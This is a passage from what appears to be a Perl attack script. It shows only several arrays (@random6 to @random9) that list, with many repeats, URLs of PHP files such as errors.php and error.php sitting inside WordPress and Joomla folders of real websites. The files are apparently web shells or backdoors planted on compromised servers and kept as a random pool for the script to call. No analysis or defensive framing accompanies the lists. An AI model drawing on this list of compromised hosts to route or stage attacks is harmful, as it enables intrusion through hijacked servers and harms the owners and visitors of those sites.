"http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random6 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random7 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random8 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random9 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", 